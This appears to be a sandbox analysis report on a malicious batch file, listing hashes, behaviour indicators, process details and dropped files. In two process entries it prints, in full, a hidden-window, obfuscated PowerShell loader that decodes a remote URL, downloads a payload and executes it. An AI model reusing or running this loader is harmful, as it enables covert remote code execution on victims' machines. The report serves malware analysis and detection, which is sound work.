File name:

69acba5561c375a92d1b6354e63334cbb2184d6ae64583a189202d892248cd8b.bat

Full analysis: https://app.any.run/tasks/a88b847a-3fa5-46b1-8fa9-5528ca6528ea
Verdict: Malicious activity
Analysis date: June 13, 2024, 17:19:57
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (6325), with no line terminators
MD5:

20CA84F6106491B75D423A306281655A

SHA1:

886821F1A66E3AA2949E8ACF803704046567310C

SHA256:

69ACBA5561C375A92D1B6354E63334CBB2184D6AE64583A189202D892248CD8B

SSDEEP:

192:p6424zg7rOrRUVuVlfa7/jy66dIks0Onf:IGCNuVlfa7v6dIksL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3824)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 4140)
      • powershell.exe (PID: 3824)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)

    • Suspicious use of asymmetric encryption in PowerShell

      • cmd.exe (PID: 4140)
      • powershell.exe (PID: 3824)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4140)
      • powershell.exe (PID: 3824)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4548)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5600)

    • Executes application which crashes

      • wab.exe (PID: 5600)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 3824)

    • Checks proxy server information

      • powershell.exe (PID: 3824)
      • wab.exe (PID: 5600)
      • WerFault.exe (PID: 2600)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4548)

    • Reads the computer name

      • wab.exe (PID: 5600)

    • Checks supported languages

      • wab.exe (PID: 5600)

    • Manual execution by a user

      • clip.exe (PID: 2280)

    • Reads the software policy settings

      • WerFault.exe (PID: 2600)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
136
Monitored processes
11
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs wab.exe no specs wab.exe werfault.exe clip.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1188"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
1676"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Exogenously.Ebu && echo t"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2280"C:\Windows\SysWOW64\clip.exe"C:\Windows\SysWOW64\clip.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Clip - copies the data into clipboard
Version:
10.0.19041.1 (WinBuild.160101.0800)
2600C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5600 -s 260C:\Windows\SysWOW64\WerFault.exe
wab.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3824powershell.exe -windowstyle hidden "$Sprunget = 1;$Genkaldelsens='ring';Function Synclinorial($Nonprotractile){$Delhed=$Nonprotractile.Length-$Sprunget;$kvajpanderne='Subst'+$Genkaldelsens;For( $Stipular=5;$Stipular -lt $Delhed;$Stipular+=6){$Pentander+=$Nonprotractile.$kvajpanderne.Invoke( $Stipular, $Sprunget);}$Pentander;}function Alliancering($Synonymity){ .($Kltringstreg) ($Synonymity);}$Chaunting=Synclinorial 'De teM UudvoDiffuzCaulii ellelX,roplBuketaDiver/Epigr5 Fase.Total0Trime Forna(AndraWDesari awfn The.dK rtooTritowAntensSwe.p BareNBort,TB,nin A,ili1antif0Cou,t. Spir0Coako; Fril reelWGillii MassnImi,i6 Fuge4 Cise;Conso IllaxShort6 C rs4Spiri; klap UdspirDel rvAn so:Afnaz1Woolw2Venus1Ogcoc.Impla0 enti)U,fie TelefGTrusse Symfc B.rkkha.dboBotti/Nords2F.etc0Reinw1 Sand0Baade0Hie,o1koagu0Vadsk1prin. tarveFRegioiOdo.trBleepephylafturfioH,llixK.rke/Stamp1Sharp2U dec1Lo.de.Blom,0Pinka ';$Ma=Synclinorial 'blresUUn.arsThe ceFolkerFork -H,steA Gli,gAarb,e Te.tnT,raptNat.l ';$Winders=Synclinorial 'zips.h Afskt jenet FuglpUnaid:Krybb/Gonoc/Or,tl1Infic9O.tli4Omstr. B.aa5 nerv9Umbr . For,3Depre1Cont..Guazu1Safr 8 Ayuh7Ide.r/DinarCDecerr Vinda In,efiono,tHordo6,achy7 Da.g. p,ckcAurigsJaquevLagen ';$Karatens=Synclinorial 'Flyte>Unapp ';$Kltringstreg=Synclinorial 'blodsiCadaseT,rolxStyrk ';$Manuductive='Slvvrdiens';$quamoclit = Synclinorial 'WoodceMisgucS.mulhMoonwoexoco Outbr%OrdreaPleurpTe.ripDaftbdObliga,ampetBu,asaGynge%Brnet\merceEUngeox,relroSemeogspndee SystnExpeto estmuhor,isW rdmlVa,dlyBrems.sindsESporsbbrittuTrskr Colou&Velpl& fskr BanneeNic.rcKoldthJa.meoInd r Tam tSvage ';Alliancering (Synclinorial 'Parap$,ericgHookulBekraoFjortbGrafiavad klVagin:M.aleUSkr.pd IrensSugnikKjetii stunvsammenBial iDenumnSkedegBl as= Inde(Udue.c,lfadmConscd Alko Al.m/.iffucFor.b Sextu$Megabq LeviuBrndeaSkat mi,flaoHaandc,psnul QuitiTub.rtPet,i)reglu ');Alliancering (Synclinorial 'Udela$Carp,gSpgell ignaone sib SupeaIsothl.utur:Cent.AS,ltimBemrka.iblisCarvos ylleforbidiref =Erhve$ ErstWP,okuisiciln P aedUdlejeFiskerCha.cs ,adm..igsds LderpApolol u,cuiSwatttAppla(Nonv.$Flip,K Udvia DilarHi glaHoldet,ntuieLysognSammes E ec)Bandl ');$Winders=$Amassed[0];$Betrkkene= (Synclinorial 'Fr gh$ Euryg S,jplAf.stoRelikbIre.aaA.ighlObse :Tro tBLideleHetaetInteraLan.glTrunci GevanOptomgUnfu,sOmbygsMusqutBeleja ilvrn P ntd PartsMemorn Hyp,iSemian torrgBilleeAmatrr Kos.nArmoreEpitysUncar1Vandd8 Opti9Op.th= SoneNPodieeE,itrw bry-Inte,OIbe.hb ScorjSaltve Gel cMo.ogtDunca KalotS W,neyVanh,sBofl,tBaa,le KrepmLoran.HjreiNKontreTh.ontInval.MarryWCyanieInterb AntiCTrib,lReacciNonadeDo.innFasert');$Betrkkene+=$Udskivning[1];Alliancering ($Betrkkene);Alliancering (Synclinorial 'Soupf$Hubs BspildePictit kivea .ngll Po ti valnCorvegResfls Press RecotFaglia LongnIndskdCandlsKnoppnDu pmiBallenPockegD,stre ,ortr.punsnProbaeFarfos Le,n1 Dam 8Bgers9Stoma.BosquHTrab,eDonera besdPersoeNignyrBlippsVen,t[Soege$BasseM SughaUafmr]Under=Paris$ AlimCPapf h B,mbaVurdeuOverhnTromptB.akfiPeckan NglegS.ion ');$Plastfiberoptisk=Synclinorial ' Knap$SlutvB BerreScombtWi sia apsulEn,reiStem.nlan.egAkupus Unexs.icent.drenaBoksenSpi.odCa,casFancynAlmsmiFralgnTobakgFiltreBriber,aadenSverieAr,acs Garr1Knebl8 Jour9 Rens.H,witD TilpoGen,ewFredsnSacellttnino Sva,a TaaldAer,sFSels,i gal,l imekeSkldu(bo,be$ FiksW krtoig omenTill,dSy.teeDurinru.ders Opti,trske$fors.P San.i Mal.aInaquf,otatfArmigeFe tessti i)Poin ';$Piaffes=$Udskivning[0];Alliancering (Synclinorial 'Dreis$ J.legU,forlVirgio VirkbIso.aaSaughlFisk,:,ormoJ ,mude ForgnRe.revPersoiZeolidSki.hnLaryneTestarBuksesOpgav7bette4Rajid=Boo a(F.rieT,radsePolypsG,ngltUdfal-OrbicPEth,naNonm.tForsthGr.ff Chrom$Sh,adPCovariIngraaMa.khfbrugsfdifdaeEusebs Er,e) Mi,r ');while (!$Jenvidners74) {Alliancering (Synclinorial 'Taile$LoftegcrosslLac eoElectbPes.oaTllealAnmel:FljtiDShintyOpslag TrfotChambiImm,ggI divsTurbitBiodyeplims=Fre.l$Smoret,inkerUp,lauSubjeeKlage ') ;Alliancering $Plastfiberoptisk;Alliancering (Synclinorial 'GldenSZonelt ,tena Ef erTriuntSamot-LejdeSPaatal Inciesqueee valipReve, Tipp4 Opla ');Alliancering (Synclinorial 'Forvi$Tria g slovlMessioOpk sbSub aaRi del Diss:.anemJ PluteCactanPseudv nconiRefrad ProcnModoce HissrlistesCelle7 Acce4Dyrlg= ,ank( AntiTMasoceFa essFo.cet Tran- SulcP Fjora ,ecatMenoshDrift Dap $BilasPTrippi AudiaFiskefBocalfHospieSoddes Stol)Besti ') ;Alliancering (Synclinorial ' Magn$Le,pagDitlelStuttoKlemab ,nvoaElastl Gens:CatalM.anauaUnretlUn out Alg oBrndbbCyt.ti SurgoTerapsMumleec.ole=Antis$S,inag NauplTableo hjlpbBilleaVam olUncle:Sexl.O ScenpBloodtLap.da Precg sydaeMembrr SvineBetry+.unke+Apo a%Knaph$ resAru.lemU,motaUn,omsCommoscheckeKnoxvdSklme.AmblecchutnoAneuruCohopnSk.estColor ') ;$Winders=$Amassed[$Maltobiose];}$Melindas=307131;$Stemmatous=28392;Alliancering (Synclinorial ' jord$angwig .pnelFrigio Everb DextaRumkalUdr.v:RummaG AfrelLuntea D.ivdUndskiTillbiTampn asci=Pha,t FiskGUtilse OvertUd od-dag iCcasitoAdornnSad.itSp.oweSheltnGodmotLevuz Lager$spr,kPLaur i Traca grasfGra if F sceCurvisIso,h ');Alliancering (Synclinorial 'Svaj,$BachegAtloilMo.tioBjergbDiamiaDe,sel .ice: TungBEmbolaSpunknGlid,kArmeneSmovsnShack Photo=,ndes Djvel[AlvidSinseay Sh,rsAmtsstMorayeOmsaemTillo.DdbleCBi.deodre,hn TracvDandieUdkikrD multPaper] Cucu:Alpa :GainiFHyp orUnbouopatr,mParotBR,creaflamesChagaeungue6Ferru4SecreS .onmtTskt rRuineiTeedln TndegDe,la(Augef$ReshvGFuppelVaabeaB ontd Mis.iHusariP,rid)Burka ');Alliancering (Synclinorial 'T.urg$Penargap.tplYaruro Ade,bLackwa Rekol Pa.t:FolkeD,etteaB.issnmoldasSk,ttk.ilkbe UngrrCowitnUnamoeLnkla H kta=Vande Whimb[An,inSBaryty MaynsballetPreuseCompum Nyvo.Raci,Tvidere.ccepxKongetDuend.SmledE AfganFla.icTel.ro,ppaldStereiCo.runAandegL,dle]Sadbo:Motor: quatALnderSAmoraCS.yfoI,inuoIudfal. CiphG Rec,e pro t PariSHunkytHus,grJetmaiIsoamnKontrgEr.ve( Nume$ JuleBOp ulaScrimnplejekCan.ueRe,oun Ompo)Ovato ');Alliancering (Synclinorial 'Comm $SkolegPr.jelKurs oOphthbUnguiasammelSl kn: Dr,uFGlimmiRookesrgbomk PerceAarvasThun,tFlankiHove,m Vekte ReshrM hat=Extra$ A,owD Ud,taGenavnDochosRedifkEfflueAto.ar KamunSvi eeUncor.ClartsudtryuBoligbbu,dfsPerjutHi,torSitueiNuetsnUnd,rgRens,( In,e$NoncoMFin,reSoup,lUfat.iStnken RegndEndowaUncussUdlng,aug,u$GgebaSSek,ltHexoee,ngasmAchiemsoegsaReprotFlagroProduu fleksTattl)Peebe ');Alliancering $Fiskestimer;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4124\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4140C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\69acba5561c375a92d1b6354e63334cbb2184d6ae64583a189202d892248cd8b.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4548"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sprunget = 1;$Genkaldelsens='ring';Function Synclinorial($Nonprotractile){$Delhed=$Nonprotractile.Length-$Sprunget;$kvajpanderne='Subst'+$Genkaldelsens;For( $Stipular=5;$Stipular -lt $Delhed;$Stipular+=6){$Pentander+=$Nonprotractile.$kvajpanderne.Invoke( $Stipular, $Sprunget);}$Pentander;}function Alliancering($Synonymity){ .($Kltringstreg) ($Synonymity);}$Chaunting=Synclinorial 'De teM UudvoDiffuzCaulii ellelX,roplBuketaDiver/Epigr5 Fase.Total0Trime Forna(AndraWDesari awfn The.dK rtooTritowAntensSwe.p BareNBort,TB,nin A,ili1antif0Cou,t. Spir0Coako; Fril reelWGillii MassnImi,i6 Fuge4 Cise;Conso IllaxShort6 C rs4Spiri; klap UdspirDel rvAn so:Afnaz1Woolw2Venus1Ogcoc.Impla0 enti)U,fie TelefGTrusse Symfc B.rkkha.dboBotti/Nords2F.etc0Reinw1 Sand0Baade0Hie,o1koagu0Vadsk1prin. tarveFRegioiOdo.trBleepephylafturfioH,llixK.rke/Stamp1Sharp2U dec1Lo.de.Blom,0Pinka ';$Ma=Synclinorial 'blresUUn.arsThe ceFolkerFork -H,steA Gli,gAarb,e Te.tnT,raptNat.l ';$Winders=Synclinorial 'zips.h Afskt jenet FuglpUnaid:Krybb/Gonoc/Or,tl1Infic9O.tli4Omstr. B.aa5 nerv9Umbr . For,3Depre1Cont..Guazu1Safr 8 Ayuh7Ide.r/DinarCDecerr Vinda In,efiono,tHordo6,achy7 Da.g. p,ckcAurigsJaquevLagen ';$Karatens=Synclinorial 'Flyte>Unapp ';$Kltringstreg=Synclinorial 'blodsiCadaseT,rolxStyrk ';$Manuductive='Slvvrdiens';$quamoclit = Synclinorial 'WoodceMisgucS.mulhMoonwoexoco Outbr%OrdreaPleurpTe.ripDaftbdObliga,ampetBu,asaGynge%Brnet\merceEUngeox,relroSemeogspndee SystnExpeto estmuhor,isW rdmlVa,dlyBrems.sindsESporsbbrittuTrskr Colou&Velpl& fskr BanneeNic.rcKoldthJa.meoInd r Tam tSvage ';Alliancering (Synclinorial 'Parap$,ericgHookulBekraoFjortbGrafiavad klVagin:M.aleUSkr.pd IrensSugnikKjetii stunvsammenBial iDenumnSkedegBl as= Inde(Udue.c,lfadmConscd Alko Al.m/.iffucFor.b Sextu$Megabq LeviuBrndeaSkat mi,flaoHaandc,psnul QuitiTub.rtPet,i)reglu ');Alliancering (Synclinorial 'Udela$Carp,gSpgell ignaone sib SupeaIsothl.utur:Cent.AS,ltimBemrka.iblisCarvos ylleforbidiref =Erhve$ ErstWP,okuisiciln P aedUdlejeFiskerCha.cs ,adm..igsds LderpApolol u,cuiSwatttAppla(Nonv.$Flip,K Udvia DilarHi glaHoldet,ntuieLysognSammes E ec)Bandl ');$Winders=$Amassed[0];$Betrkkene= (Synclinorial 'Fr gh$ Euryg S,jplAf.stoRelikbIre.aaA.ighlObse :Tro tBLideleHetaetInteraLan.glTrunci GevanOptomgUnfu,sOmbygsMusqutBeleja ilvrn P ntd PartsMemorn Hyp,iSemian torrgBilleeAmatrr Kos.nArmoreEpitysUncar1Vandd8 Opti9Op.th= SoneNPodieeE,itrw bry-Inte,OIbe.hb ScorjSaltve Gel cMo.ogtDunca KalotS W,neyVanh,sBofl,tBaa,le KrepmLoran.HjreiNKontreTh.ontInval.MarryWCyanieInterb AntiCTrib,lReacciNonadeDo.innFasert');$Betrkkene+=$Udskivning[1];Alliancering ($Betrkkene);Alliancering (Synclinorial 'Soupf$Hubs BspildePictit kivea .ngll Po ti valnCorvegResfls Press RecotFaglia LongnIndskdCandlsKnoppnDu pmiBallenPockegD,stre ,ortr.punsnProbaeFarfos Le,n1 Dam 8Bgers9Stoma.BosquHTrab,eDonera besdPersoeNignyrBlippsVen,t[Soege$BasseM SughaUafmr]Under=Paris$ AlimCPapf h B,mbaVurdeuOverhnTromptB.akfiPeckan NglegS.ion ');$Plastfiberoptisk=Synclinorial ' Knap$SlutvB BerreScombtWi sia apsulEn,reiStem.nlan.egAkupus Unexs.icent.drenaBoksenSpi.odCa,casFancynAlmsmiFralgnTobakgFiltreBriber,aadenSverieAr,acs Garr1Knebl8 Jour9 Rens.H,witD TilpoGen,ewFredsnSacellttnino Sva,a TaaldAer,sFSels,i gal,l imekeSkldu(bo,be$ FiksW krtoig omenTill,dSy.teeDurinru.ders Opti,trske$fors.P San.i Mal.aInaquf,otatfArmigeFe tessti i)Poin ';$Piaffes=$Udskivning[0];Alliancering (Synclinorial 'Dreis$ J.legU,forlVirgio VirkbIso.aaSaughlFisk,:,ormoJ ,mude ForgnRe.revPersoiZeolidSki.hnLaryneTestarBuksesOpgav7bette4Rajid=Boo a(F.rieT,radsePolypsG,ngltUdfal-OrbicPEth,naNonm.tForsthGr.ff Chrom$Sh,adPCovariIngraaMa.khfbrugsfdifdaeEusebs Er,e) Mi,r ');while (!$Jenvidners74) {Alliancering (Synclinorial 'Taile$LoftegcrosslLac eoElectbPes.oaTllealAnmel:FljtiDShintyOpslag TrfotChambiImm,ggI divsTurbitBiodyeplims=Fre.l$Smoret,inkerUp,lauSubjeeKlage ') ;Alliancering $Plastfiberoptisk;Alliancering (Synclinorial 'GldenSZonelt ,tena Ef erTriuntSamot-LejdeSPaatal Inciesqueee valipReve, Tipp4 Opla ');Alliancering (Synclinorial 'Forvi$Tria g slovlMessioOpk sbSub aaRi del Diss:.anemJ PluteCactanPseudv nconiRefrad ProcnModoce HissrlistesCelle7 Acce4Dyrlg= ,ank( AntiTMasoceFa essFo.cet Tran- SulcP Fjora ,ecatMenoshDrift Dap $BilasPTrippi AudiaFiskefBocalfHospieSoddes Stol)Besti ') ;Alliancering (Synclinorial ' Magn$Le,pagDitlelStuttoKlemab ,nvoaElastl Gens:CatalM.anauaUnretlUn out Alg oBrndbbCyt.ti SurgoTerapsMumleec.ole=Antis$S,inag NauplTableo hjlpbBilleaVam olUncle:Sexl.O ScenpBloodtLap.da Precg sydaeMembrr SvineBetry+.unke+Apo a%Knaph$ resAru.lemU,motaUn,omsCommoscheckeKnoxvdSklme.AmblecchutnoAneuruCohopnSk.estColor ') ;$Winders=$Amassed[$Maltobiose];}$Melindas=307131;$Stemmatous=28392;Alliancering (Synclinorial ' jord$angwig .pnelFrigio Everb DextaRumkalUdr.v:RummaG AfrelLuntea D.ivdUndskiTillbiTampn asci=Pha,t FiskGUtilse OvertUd od-dag iCcasitoAdornnSad.itSp.oweSheltnGodmotLevuz Lager$spr,kPLaur i Traca grasfGra if F sceCurvisIso,h ');Alliancering (Synclinorial 'Svaj,$BachegAtloilMo.tioBjergbDiamiaDe,sel .ice: TungBEmbolaSpunknGlid,kArmeneSmovsnShack Photo=,ndes Djvel[AlvidSinseay Sh,rsAmtsstMorayeOmsaemTillo.DdbleCBi.deodre,hn TracvDandieUdkikrD multPaper] Cucu:Alpa :GainiFHyp orUnbouopatr,mParotBR,creaflamesChagaeungue6Ferru4SecreS .onmtTskt rRuineiTeedln TndegDe,la(Augef$ReshvGFuppelVaabeaB ontd Mis.iHusariP,rid)Burka ');Alliancering (Synclinorial 'T.urg$Penargap.tplYaruro Ade,bLackwa Rekol Pa.t:FolkeD,etteaB.issnmoldasSk,ttk.ilkbe UngrrCowitnUnamoeLnkla H kta=Vande Whimb[An,inSBaryty MaynsballetPreuseCompum Nyvo.Raci,Tvidere.ccepxKongetDuend.SmledE AfganFla.icTel.ro,ppaldStereiCo.runAandegL,dle]Sadbo:Motor: quatALnderSAmoraCS.yfoI,inuoIudfal. CiphG Rec,e pro t PariSHunkytHus,grJetmaiIsoamnKontrgEr.ve( Nume$ JuleBOp ulaScrimnplejekCan.ueRe,oun Ompo)Ovato ');Alliancering (Synclinorial 'Comm $SkolegPr.jelKurs oOphthbUnguiasammelSl kn: Dr,uFGlimmiRookesrgbomk PerceAarvasThun,tFlankiHove,m Vekte ReshrM hat=Extra$ A,owD Ud,taGenavnDochosRedifkEfflueAto.ar KamunSvi eeUncor.ClartsudtryuBoligbbu,dfsPerjutHi,torSitueiNuetsnUnd,rgRens,( In,e$NoncoMFin,reSoup,lUfat.iStnken RegndEndowaUncussUdlng,aug,u$GgebaSSek,ltHexoee,ngasmAchiemsoegsaReprotFlagroProduu fleksTattl)Peebe ');Alliancering $Fiskestimer;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4916"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Exogenously.Ebu && echo t"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
5032\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 003
Read events
17 981
Write events
22
Delete events
0

Modification events

(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3824) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
9
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
2600WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_wab.exe_b5636695c6edba5de66b3d65ae913293799b8f1_9c01b28c_8882dfbc-1877-43a4-956b-c84db230c4cd\Report.wer
MD5:
SHA256:
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7HLTUCXZLC4CQZA8NLV3.tempbinary
MD5:6033E1A17B8A1FC76EDC6D8B1C2A1868
SHA256:97D25BEC5E5BE152C9BA1BE278A58A35BCBAD351F4B449FF4B3F8E64DBF7ACA3
3824powershell.exeC:\Users\admin\AppData\Roaming\Exogenously.Ebutext
MD5:5EF2D5CA0645D6740CAA8788B7D3C661
SHA256:DFF4864E43686358CD3575F98A1684BA073105778C4FF8315512AC68D0B33514
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF114311.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
4548powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ixzzl4ce.5mw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4548powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k2k01hvj.jj1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2600WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERB05D.tmp.WERInternalMetadata.xmlxml
MD5:8488D715A8C239DE507D4162FB5BE570
SHA256:10A6EE6B034A2BE2C35686EFFE3BCA051BFD09DDC5F213DCC36B4C1E0A7F22DB
2600WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERAF14.tmp.dmpdmp
MD5:556E4E66F9C68C03E27A952998327AF4
